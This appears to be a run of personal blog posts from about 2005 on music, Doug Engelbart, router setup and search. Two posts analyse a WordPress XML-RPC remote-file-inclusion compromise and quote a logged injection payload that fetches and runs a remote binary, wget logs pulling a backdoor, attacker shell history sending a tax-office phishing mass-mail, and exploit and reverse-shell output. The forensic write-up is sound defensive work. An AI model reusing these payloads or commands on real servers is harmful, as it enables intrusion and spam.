Music Stats

The other day Andy mentioned it didn’t seem like I had many female artists on my iPod, which is accurate, but it got me wondering what my actual mix was, so I ran a couple of random sets of 25 and 100 songs, and it comes out to about 70% male vocals, 15% female, and 15% instrumental, with a slight edge on the female vocals vs instrumental pieces. Which seems backwards to me, but it’s occurred to me that the instrumental songs (primarily post-rock and various types of electronic music) are longer on average.

It also occurred to me, while manually counting, that this type of structured tagging and listening pattern/music analysis would be insanely addictive and potentially useful, but I don’t think that there’s anything out there that currently does anything like that, and certainly nothing integrated with your music library.

On Engelbart

Doug Engelbart speaking

Tonight I went to Doug Engelbart’s presentation dubbed “Raising the Collective IQ,” sponsored by Future Salon. I wasn’t sure what exactly to expect, but I was glad to report that Doug was both quite lucid and the topic matter fairly interesting (if slightly vague towards the end).

The talk began with some insightful anecdotes recounting his early experiences that led him into his research, and then centered primarily on discussing capability infrastructure, mostly based on the last paper he published in 1992, Toward High-Performance Organizations:
A Strategic Role for Groupware
.

There were definite insightful comments on scaling these kinds of infrastructure, and the points on human system and physiological “component capabilities” have definitely been foremost in my mind recently in thinking about hacking process and organizational issues, both in corporate organization (ahem) and in social software contexts (ahem).

Also, these points definitely strongly touch two books I’ve read and recently enjoyed: Jeff Hawkins’ On Intelligence, which is about describing human intelligence in a memory-prediction neurological model, and Douglas Rushkoff’s latest book, Get Back in the Box, which has more than a few great a-ha moments.

Here’s a quote from one of Engelbart’s slides on capability infrastructure:

Consider that human capability (individual or collective) depends upon an integrated infrastructure of component capabilities.

That being said, the talk wasn’t all sunshine and roses. An implication of Engelbart’s talk was that the concepts he has been talking about, the Dynamic Knowledge Repository, and his CoDIAK/bootstrap model haven’t been implemented yet, and when one looks at the type of tools that are currently being developed and are obviously serving to augment collective intelligence, it seems to me that that’s not the case. Engelbart continues to talk about first steps and different models needed to implement DKRs and seems to dismiss things like the Wikipedia, and well, the Internet.

When you consider all the components that make up the modern online experience: search engines and the related portal tools, IM, social networks, community sites, forums, blogs, feed readers, etc, the amount of added mental bandwidth is pretty astounding. Sure, it’s loose and messy and a work in progress, but it seems to be exactly what Engelbart espouses. And like the command line of his AUGMENT system, yes it has a harsh learning curve, but when you master it, there’s a similarly proportionate payoff.

I’m not sure if this seeming blind spot is an artifact of a “worse is better” blindspot, or if its something else. Apparently, Engelbart has been using AUGMENT every day for the past 40 years. I’m sure in comparison, the response time and hypertext capabilities of the Web must be offputting, but again, worse is better prevails because it was one thing that AUGMENT wasn’t: open.

I didn’t get to ask this question, but seems ironic to me, especially in light of Engelbart’s praise early on in open source, that AUGMENT, even though in continuous use for the past 40 years has never been released or cloned. Can you imagine the improvements that could be made if AUGMENT had itself had adhered to the CoDIAK model and been collaboratively improved? Instead, we have the web, which did exactly that: a resource that has been incrementally and collaboratively developed over the past decade, and has turned into what is now the world’s largest information repository and communication tool.

Doug Engelbart is a visionary, his work and writing as far as 40 years back still has incredible relevance, his goals are laudable, and it was a real treat to hear him talk. I guess I’m just puzzled and a bit disappointed when he doesn’t see CoDIAK and NICs when they appear (at least to me) to be sitting right there. Maybe it’s one of those paridigmatic issues he talks about.

I’m online!

I finally got my net connection set up at home yesterday morning, and an unfortunate power outage led me to revisit my router setup tonight. It turns out that OpenWRT has been going through a lot of changes over the past year, with its latest veresion being a series of “white russian” releases.

Since I wanted to do an set up a captive portal anyway, I reinstalled and have been futzing around for the past couple hours, which, while not horribly productive, has been educational and fun, and most importantly, has not resulted in me bricking anything.

Right now it’s looking like WifiDog is my best bet for generating a captive portal, although I haven’t looked at how the ACLs are set up (I’m thinking that with the proper firewall (ebtables) and encryption setup, it might be possible to both have an open AP and something somewhat secure (I might be better off giving that up on that or just having a separate AP for that though).

Worth Posting

The MyWeb integration convinced me to switch my homepage to Yahoo! Search but my Firefox toolbar still defaults to Google, and I have to admit, I usually like the results for the latter better still. So, I thought it’d be worth noting that here’s a search where Yahoo! definitively did better:

What’s interesting to note, like my MyWeb experience, it wasn’t the pure algorithmic results that provided a better results, but the Yahoo! Shortcut that answered my question. I love these sort of things (both on Google, which started pioneering the search as cmdline, and still has better parsing on some things), but I think the YubNub-like Shortcuts are just getting started in terms of fullfilling their potential. My idea of the new hotness: linking your shortcuts into your MyWeb community and then auto-promoting useful shortcuts based on a simple Ajax ‘was this helpful’ feedback mechanism.

End of the Year, Beginning of the Year

It’s been a hectic past few months, so I’m spending this new years eve wrapping up things and getting a head start on some things. I just finished making some last-minute year-end contributions (EFF, FSF, Wikipedia, Media Matters, and the Red Cross, among others). I’ve been spending the past couple days on cleaning and reorganizing my OmniOutliner todo list. I’m hoping to get to cleaning my notes files into the appropriate wikis (I’ve decided that this is the year that I move towards moving all my permanent online-reference/storage off of single machines and onto something theoretically more stable and easier to back up). I’ve also been ignoring this site recently, but as I get settled in (I finally have gotten my [fingers-crossed] permanent residence up north), I’m hoping to have some time and energy to try something new here.

Here’s to 2006.

Anantomy of the WP XML-RPC RFI Attack

These are being filtered by mod_security now, which makes it interesting to post:

HTTP/1.1 403 Forbidden
Content-Length: 212
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 24.16.48.220 – – [19/Dec/2005:05:52:37 –0800] “POST /blog/xmlrpc.php HTTP/1.1” 403 221
Handler: (null)
—————————————-
POST /blog/xmlrpc.php HTTP/1.1
Host: 216.66.19.135
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length: 269
mod_security-message: Access denied with code 403. Pattern match “!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)” at HEADER
mod_security-action: 403

269
<?xml version=”1.0″?><methodCall><methodName>test.method</methodName><params><param><value><name>’,”));echo ‘_begin_’;echo `cd /tmp;wget 65.218.1.216/nikons;chmod +x nikons;./nikons `;echo ‘_end_’;exit;/*</name></value></param></params></methodCall>

Dammit Leroy (Getting Haxored is No Fun)

I was in Starbucks earlier this evening (yesterday) catching up on some things before flying back up north when Gabe IM’d me that Apache was down. The machine was pinging (a bit slow, but it could have been my connection). No worries, log in and kick httpd…

When I logged in, load was high, which was a bit odd since Apache was down, but not unheard of… but top was showing that Postfix was the program chewing up my resources. There error I got restarting Apache gave me a sinking feeling:

Apache2(98)Address already in use: make_sock: could not bind to address 0.0.0.0:80

Now, there are perfectly plausible explanations for this type of error. This, however, is not one that you want:

snowball lhl # netstat -lnp | grep '0.0.0.0:80'
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN     13715/r0nin  

This was my first time any server I’ve run has been compromised, and it’s a bit embarrassing that it happened via remote file inclusion, but I suppose RFI is to traditional exploits how e-mail viruses were to the prior breed. It appears that my experience isn’t unique. I found serveral writes ups while I was doing forensic analysis (which I’ll outline my process and rationale for any other poor souls so afflicted):

I’m going to try to get some sleep, so I’ll skip the narrative, and save some of the post-mortem / next steps for another time.

  • First I killed Postfix. I didn’t do an exact count, but I’m guestimating that there was somewhere between 300K to 0.5M mails in the queue. I saved a couple but that actually turned out to not be necessary.
  • I found r0nin pretty quickly in /tmp along with some other files:
    brk, brk2, brk2.1, brk2.2, brk2.3, brk2.4, dc, dc.1, dc.2, dc.txt, kmod, kmod2, ptrace24, pwned, r0nin, r0nin.1, uselib24, uselib24.1, uselib24.2, uselib24.3, uselib24.4, w00t, w00t.1 — these are a mix of different versions, but also some duplicates. I chmod 000’d these and moved them to a forensics area.
  • I should probably mention that before doing those things, I did some sanity checks by checking my apt/sources.list and forcing fresh copies of chkrootkit and rkhunter, and basic utilities like netstat, who, ps, last etc to be reasonably sure (along w/ the nature of the compromise) that there wasn’t a live person at the other end. I also combed through the user files to look for anything unusual, but thankfully that seemed fine as well.
  • Next I killed just about everything and threw up ultra-paranoid iptables rules (everything off, SSH only from the IP I was sitting on and another safe entry point)
  • Grepping through my logs, these were the first things that popped out:
    error.log.1:--16:01:20--  http://www.full-comandos.com/sougay/r0nin
    error.log.1:           => `r0nin'
    error.log.1:16:01:20 (190.09 KB/s) - `r0nin' saved [19258/19258]
    error.log.1:--19:59:35--  http://www.full-comandos.com/sougay/r0nin
    error.log.1:           => `r0nin.1'
    error.log.1:19:59:35 (191.14 KB/s) - `r0nin.1' saved [19258/19258]
    error.log.1:--16:01:20--  http://www.full-comandos.com/sougay/r0nin
    error.log.1:           => `r0nin'
    error.log.1:16:01:20 (190.09 KB/s) - `r0nin' saved [19258/19258]
    error.log.1:--19:59:35--  http://www.full-comandos.com/sougay/r0nin
    error.log.1:           => `r0nin.1'
    error.log.1:19:59:35 (191.14 KB/s) - `r0nin.1' saved [19258/19258]

    These corresponded to the second here:

    avantbard.com-access.log:201.29.25.2 - - [16/Dec/2005:16:01:20 -0800] "POST /corral//xmlrpc.php HTTP/1.1" 200 65 "-" "-"
    avantbard.com-access.log:201.29.25.2 - - [16/Dec/2005:19:59:35 -0800] "POST /corral//xmlrpc.php HTTP/1.1" 200 13 "-" "-"
    

    Gabe was running a WordPress is not secure version of WP (1.2) here. Because of the ways logs were rotated / split up, and since I was looking for a GET query string, not a POST, it took me a while to match up the exact attack vector, which was one of the reasons that the site was down for a few hours (I just didn’t feel comfortable putting stuff back up willy nilly)

  • One of the things I decided to install before opening any of the iptables back up was mod_security. I’m now running mod_security with most of this how-to’s options and the Snort ruleset. It’s rather draconian at the moment, but that’s probably a better place to work from
  • Back to the spamming, there was a .bash_history in /var/tmp that showed what was actually done once the shell was exploitable. (This was only possible because my iptables weren’t properly loaded after reboots – now fixed)
    uname -a
    mkdir
    mkdir .teste
    mkdir .teste
    curl 
    curl -O www.canaldiboa.ubbi.com.br/enviar.pl
    mkdir .teste
    cd .teste
    pwd
    cd /tmp
    tmp
    /tmp
    mount tmp
    cd temp
    ls
    ls
    /temp
    ls
    cd /tmp
    ls
    cd .teste
    ls
    ls
    cd /tmp
    ls
    cd .teste
    ls
    mkdir .teste
    ls
    cd .teste
    ls
    wget www.canaldiboa.ubbi.com.br/enviar.pl
    wget www.receita-fazenda.com/lista.txt
    wget www.receita-fazenda.com/corpo.html
    sed -e 's/@acessototal.com.br/@ufba.br/g' lista.txt > lista2.txt
    perl enviar.pl lista2.txt Receita@receita.gov.br "URGENTE: Verifique seu CPF" corpo.html

    I ran a Sam Spade lookup on receita-fazenda.com and there are some interesting things here. The listed contact, Wayne Tanski, has caught the eye of another blogger, and there’s a site, http://dsoulzin.net/dsoul/ which has several perl/php scripts, no doubt for RFI. Wayne’s address is different from the one Sam Spade lists, but the connection of the dsoulzin domain name and the dsoulzin@hotmail.com mail address listed with the registrar is pretty telling. In anycase, the enviar.pl is the script that did the actual mail queue injection, which now is adequate to explain everything.

  • But… not good enough for me. Despite what chkrootkit and rkhunter said, I had to make sure the binaries that were put in tmp (and obviously run) hadn’t rooted the box… I’m running a Debian kernel (2.4.27-2 + patches) and while something like ptrace should definitely not work, something like uselib had me a bit worried. So, having blocked the IPs that they’d most likely be contacting if there were to do so, and knowing they’d probably been run already I su’d to www-data and ran them all…
    snowball test $ ./brk2
    [-] Unable to determine kernel address: Operation not supported
    snowball test $ ./brk2.1
    [-] Unable to determine kernel address: Operation not supported
    snowball test $ ./brk2.2
    [-] Unable to determine kernel address: Operation not supported
    snowball test $ ./brk2.3
    [-] Unable to determine kernel address: Operation not supported
    snowball test $ ./brk2.4
    [-] Unable to determine kernel address: Operation not supported
    snowball test $ ./kmod
    [-] Unable to attach: Operation not permitted
    Killed
    snowball test $ ./kmod2
    [-] Unable to attach: Operation not permitted
    Killed
    snowball test $ ./ptrace24 
    attached
    Password: 
    snowball test $ whoami
    www-data
    snowball test $ ./pwned 
    COMPILED AND HOSTED BY ALBANIA SECURITY CLAN
    irc.gigachat.net -j #ASC
    linux kernel msync race condition
    bug discovered by sd, 
    further research by sd and *****
    this is development-in-progress code,
    redistribution prohibited!
    =============================================
    Segmentation fault
    snowball test $ ./r0nin 
    PsychoPhobia Backdoor is starting...OK, pid = 9581
    snowball test $ ./dc randomfoo.net 1666
    Data Cha0s Connect Back Backdoor
    
    [*] Dumping Arguments
    [*] Resolving Host Name
    [*] Connecting...
    [*] Spawning Shell
    [*] Detached
    
    www-data  9583  0.0  0.0  1444  368 ?        S    03:08   0:00 ./r0nin
    www-data  9584  0.0  0.1  2748 1116 pts/10   S    03:08   0:00 shell
    www-data  9585  0.0  0.1  2528 1312 ttyp0    Ss+  03:08   0:00 sh -i
    
    snowball test $ ./uselib24
    
    [+] SLAB cleanup
        child 1 VMAs 81
    [+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
    [+] vmalloc area 0xc0400000 - 0xc043742f
        Wait... \--> prepare_slab(), 255Mb
    
    [-] FAILED: try again 
    Killed
    
    
    [+] SLAB cleanup
        child 1 VMAs 65509
    [+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
    [+] vmalloc area 0xc0400000 - 0xc043742f
        Wait... \--> prepare_slab(), 255Mb
    
    [-] FAILED: try again 
    Killed
    
    snowball test $ ./w00t
    [-] Unable to determine kernel address: Operation not supported
    

    The good news is that except for r0nin, it looks like these were all busts. And now, with mod_security and working iptable rules, this shouldn’t be able to happen again.

Right now I’ve only re-enabled randomfoo since beyond the mod_security, it’s code I’ve written that I know isn’t susceptible to any of this crap. I’ve spent a good 8 hours at this point on the cleanup and writeup, but on the bright side, this was a fairly benign attack and I’ve gotten around to doing a whole bunch of stuff I’ve been putting off. More on that after I get some sleep and after the, you know, day job.

BWAHAHAHA

Be sure to check out the BBC article after you’ve spotted this.

Patient and steady with all he must bear,
Ready to meet every challenge with care,
Easy in manner, yet solid as steel,
Strong in his faith, refreshingly real.
Isn’t afraid to propose what is bold,
Doesn’t conform to the usual mould,
Eyes that have foresight, for hindsight won’t do,
Never backs down when he sees what is true,
Tells it all straight, and means it all too.
Going forward and knowing he’s right,
Even when doubted for why he would fight,
Over and over he makes his case clear,
Reaching to touch the ones who won’t hear.
Growing in strength he won’t be unnerved,
Ever assuring he’ll stand by his word.
Wanting the world to join his firm stand,
Bracing for war, but praying for peace,
Using his power so evil will cease,
So much a leader and worthy of trust,
Here stands a man who will do what he must.

Old Blog Posts

Doing a few searches for old posts reminded me that I used to occassionally have interesting things to say. A couple few years ago, I had talked about creating a random-post function for the that could also be a good way to bring up a post for categoration, tagging, updating, annotating… This is still a good idea. If I’m as busy as I’ve been, this might sit here for a while reminding me of things I could be doing on the blog.